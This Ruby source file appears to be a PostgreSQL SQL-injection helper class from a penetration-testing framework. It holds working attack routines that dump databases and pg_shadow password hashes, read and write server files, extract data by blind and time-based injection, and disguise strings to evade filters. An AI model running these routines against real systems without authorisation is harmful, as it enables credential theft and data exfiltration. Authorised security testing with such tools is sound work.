require 'base64'

#
# This class represents a PostgreSQL Injection object, its primary purpose is to provide the common SQL queries
# needed when performing SQL injection.
# This class should not be instantiated directly, refer to Msf::Exploit::SQLi#create_sqli.
#
module Msf::Exploit::SQLi::PostgreSQLi
  class Common < Msf::Exploit::SQLi::Common
    #
    # Encoders supported by PostgreSQL
    # Keys are function names, values are decoding procs in Ruby
    #
    ENCODERS = {
      base64: {
        encode: 'translate(encode(^DATA^::bytea, \'base64\'), E\'\n\',\'\')',
        decode: proc { |data| Base64.decode64(data) }
      },
      hex: {
        encode: 'encode(^DATA^::bytea, \'hex\')',
        decode: proc { |data| Rex::Text.hex_to_raw(data) }
      }
    }.freeze

    BIT_COUNTS = { 0 => 0, 0b1 => 1, 0b11 => 2, 0b111 => 3, 0b1111 => 4, 0b11111 => 5, 0b111111 => 6, 0b1111111 => 7, 0b11111111 => 8 }.freeze
    #
    # See SQLi::Common#initialize
    #
    def initialize(datastore, framework, user_output, opts = {}, &query_proc)
      if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
        # if it's a String or a Symbol, use a predefined encoder if it exists
        opts[:encoder] = opts[:encoder].downcase.intern
        opts[:encoder] = ENCODERS[opts[:encoder]] if ENCODERS[opts[:encoder]]
      end
      opts[:concat_separator] ||= ','
      super
    end

    #
    #   Query the PostgreSQL version
    #   @return [String] The PostgreSQL version in use
    #
    def version
      call_function('version()')
    end

    #
    # Query the current database name
    # @return [String] The name of the current database
    #
    def current_database
      call_function('current_database()')
    end

    #
    # Query the current user
    # @return [String] The username of the current user
    #
    def current_user
      call_function('getpgusername()')
    end

    #
    # Query the names of all the existing databases
    # @return [Array] An array of Strings, the database names
    #
    def enum_database_names
      dump_table_fields('pg_database', %w[datname]).flatten
    end

    #
    # Query the names of the tables in a given database
    # @param database [String] the name of a database, or a function call, defaults to public
    # @return [Array] An array of Strings, the table names in the given database
    #
    def enum_table_names(database = 'public')
      dump_table_fields('information_schema.tables', %w[table_name],
                        "table_schema=#{database.include?('(') ? database : "'" + database + "'"}").flatten
    end

    #
    # Query the names of the views in the given database
    # @param database [String] The name of a database, or a function call, defaults to public
    # @return [Array] An array of Strings, the view names in the given database
    #
    def enum_view_names(database = 'public')
      dump_table_fields('information_schema.views', %w[table_name], "table_schema=#{database.include?('(') ? database : "'" + database + "'"}").flatten
    end

    #
    # Query the PostgreSQL users (their username and password), this might require elevated privileges.
    # @return [Array] an array of arrays representing rows, where each row contains two strings, the username and hashed password
    #
    def enum_dbms_users
      # might require elevated privileges
      dump_table_fields('pg_shadow', %w[usename passwd])
    end

    #
    #   Query the column names of the given table in the given database
    #   @param table_name [String] the name of the table of which you want to query the column names
    #   @return [Array] An array of Strings, the column names in the given table belonging to the given database
    #
    def enum_table_columns(table_name)
      if table_name.include?('.')
        database, table_name = table_name.split('.')
      else
        database = 'public' # or current_database() ?
      end
      dump_table_fields('information_schema.columns', %w[column_name],
                        "table_name='#{table_name}' and " \
                        "table_schema=#{database.include?('(') ? database : "'" + database + "'"}").flatten
    end

    #
    #  Query the given columns of the records of the given table, that satisfy an optional condition
    #  @param table [String]  The name of the table to query
    #  @param columns [Array] The names of the columns to query
    #  @param condition [String] An optional condition, return only the rows satisfying it
    #  @param num_limit [Integer] An optional maximum number of results to return
    #  @return [Array] An array, where each element is an array of strings representing a row of the results
    #
    def dump_table_fields(table, columns, condition = '', num_limit = 0)
      return '' if columns.empty?

      one_column = columns.length == 1
      if one_column
        columns = "coalesce(#{columns.first}::text,'#{@null_replacement}')"
        columns = @encoder[:encode].sub(/\^DATA\^/, columns) if @encoder
      else
        columns = "concat_ws('#{@second_concat_separator}'," + columns.map do |col|
          col = "coalesce(#{col}::text,'#{@null_replacement}')"
          @encoder ? @encoder[:encode].sub(/\^DATA\^/, col) : col
        end.join(',') + ')'
      end
      unless condition.empty?
        condition = ' where ' + condition
      end
      num_limit = num_limit.to_i
      limit = num_limit > 0 ? ' limit ' + num_limit.to_s : ''
      retrieved_data = nil
      if @safe
        # no group_concat, leak one row at a time
        row_count = run_sql("select count(1)::text from #{table}#{condition}").to_i
        num_limit = row_count if num_limit == 0 || row_count < num_limit
        retrieved_data = num_limit.times.map do |current_row|
          if @truncation_length
            truncated_query("select substr(#{columns}::text,^OFFSET^,#{@truncation_length}) from " \
            "#{table}#{condition} limit 1 offset #{current_row}")
          else
            run_sql("select #{columns}::text from #{table}#{condition} limit 1 offset #{current_row}")
          end
        end
      else
        # if limit > 0, an alias will be necessary
        if num_limit > 0
          alias1, alias2 = 2.times.map { Rex::Text.rand_text_alpha(rand(2..9)) }
          if @truncation_length
            retrieved_data = truncated_query('select substr(string_agg(' \
            "#{alias1}, '#{@concat_separator}'),"\
            "^OFFSET^,#{@truncation_length}) from (select #{columns}::text #{alias1} from #{table}"\
            "#{condition}#{limit}) #{alias2}").split(@concat_separator || ',')
          else
            retrieved_data = run_sql("select string_agg(#{alias1}, '#{@concat_separator}')"\
            " from (select #{columns}::text #{alias1} from #{table}#{condition}#{limit}) #{alias2}").split(@concat_separator || ',')
          end
        else
          if @truncation_length
            retrieved_data = truncated_query('select substr(string_agg(' \
            "#{columns}::text, '#{@concat_separator}')," \
            "^OFFSET^,#{@truncation_length}) from #{table}#{condition}#{limit}").split(@concat_separator || ',')
          else
            retrieved_data = run_sql("select string_agg(#{columns}::text, '#{@concat_separator}')" \
            " from #{table}#{condition}#{limit}").split(@concat_separator || ',')
          end
        end
      end
      retrieved_data.map do |row|
        row = row.split(@second_concat_separator)
        @encoder ? row.map { |x| @encoder[:decode].call(x) } : row
      end
    end

    #
    # Checks if the SQL injection is working, by checking that
    # queries that should return known results return the results we expect from them
    # @return [Boolean] Whether the check determined that the injection works
    #
    def test_vulnerable
      random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
      random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
      query_string = "'#{random_string}'"
      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
      output = run_sql("select #{query_string}")
      return false if output.nil?
      (@encoder ? @encoder[:decode].call(output) : output) == random_string
    end

    #
    # Writes data to a file on the target system
    # @param fname [String] The full-path to the file where data will be written
    # @param data [String] The data to write
    # @return [void]
    #
    def write_to_file(fname, data)
      raw_run_sql("copy (select '#{data}') to '#{fname}'")
    end

    #
    # Attempt reading from a file on the filesystem
    # @param fpath [String] The path of the file to read
    # @param binary [String] Whether the target file should be considered a binary one (defaults to false)
    # @return [String] The content of the file if reading was successful
    #
    def read_from_file(fpath, binary=false)
      if binary
        # pg_read_binary_file returns bytea
        # an encoder might be needed
        call_function("pg_read_binary_file('#{fpath}')")
      else
        call_function("pg_read_file('#{fpath}')")
      end
    end

    private

    #
    #  Helper method used in cases where the response is truncated.
    #  @param query [String] The SQL query to execute, where ^OFFSET^ will be replaced with an integer offset for querying
    #  @return [String] The query result
    #
    def truncated_query(query)
      result = [ ]
      offset = 1
      loop do
        slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
        offset += @truncation_length # should be same as @truncation_length for most cases
        result << slice
        vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
        print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
        break if slice.length < @truncation_length
      end
      result.join
    end

    #
    # Checks the options specific to PostgreSQL
    # @return [void]
    #
    def check_opts(opts)
      unless opts[:encoder].nil? || opts[:encoder].is_a?(Hash) || ENCODERS[opts[:encoder].downcase.intern]
        raise ArgumentError, 'Unsupported encoder'
      end

      super
    end

    #
    # Returns the output of a PostgreSQL function call
    # @param function [String] The function call, function_name(arguments...)
    # @return [String] What the function call returns
    #
    def call_function(function)
      function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
      output = nil
      if @truncation_length
        output = truncated_query("select substr(#{function},^OFFSET^,#{@truncation_length})")
      else
        output = run_sql("select #{function}")
      end
      output = @encoder[:decode].call(output) if @encoder
      output
    end

    #
    # Returns the length of the data that query should return, this is used in blind SQL injections
    # @param query [String] The SQL query to execute
    # @param timebased [Boolean] true if it's a time-based query, false if it's boolean-based
    # @return [Integer] The length of the data that query should return
    #
    def blind_detect_length(query, timebased)
      if_function = ''
      sleep_part = ''
      if timebased
        if_function = '1=(case when ' + if_function
        sleep_part += " then (select 1 from pg_sleep(#{datastore['SqliDelay']})) else 1 end)"
      end
      i = 0
      output_length = 0
      loop do
        output_bit = blind_request("#{if_function}length((#{query})::bytea)&#{1 << i}<>0#{sleep_part}")
        output_length |= (1 << i) if output_bit
        i += 1
        stop = blind_request("#{if_function}length((#{query})::bytea)/#{1 << i}=0#{sleep_part}")
        break if stop
      end
      output_length
    end

    #
    # Retrieves the output of the given SQL query, this method is used in Blind SQL injections
    # @param query [String] The SQL query the user wants to execute
    # @param length [Integer] The expected length of the output of the result of the SQL query
    # @param known_bits [Integer] a bitmask all the bytes in the output are expected to match
    # @param bits_to_guess [Integer] the number of bits that must be retrieved from each byte of the query output
    # @param timebased [Boolean] true if it's a time-based query, false if it's boolean-based
    # @return [String] The query result
    #
    def blind_dump_data(query, length, known_bits, bits_to_guess, timebased)
      if_function = ''
      sleep_part = ''
      if timebased
        if_function = '1=(case when ' + if_function
        sleep_part += " then (select 1 from pg_sleep(#{datastore['SqliDelay']})) else 1 end)"
      end
      output = length.times.map do |j|
        current_character = known_bits
        bits_to_guess.times do |k|
          # the query below: the inner substr returns a character from the result, the outer returns a bit of it
          output_bit = blind_request("#{if_function}get_bit((#{query})::bytea, #{j * 8 + k})<>0#{sleep_part}")
          current_character |= (1 << k) if output_bit
        end
        current_character.chr
      end.join
      output
    end

    #
    # Encodes strings in the query string as hexadecimal numbers
    # @param query [String] an SQL query
    # @return [String] The input query, where strings are replaced by hex sequences
    #
    def hex_encode_strings(query)
      # for more encoding capabilities, run code at the beginning of your block
      # known issue: escaped quotes, \', detected as being string terminators
      query.gsub(/'[^']*?'/) do |match|
        if match.length == 2
          %w[left right].sample + "(chr(#{rand(1..255)}),0)"
        else
          match[1..-2].each_codepoint.map { |c| "chr(#{c})" }.join('||')
        end
      end
    end
  end
end
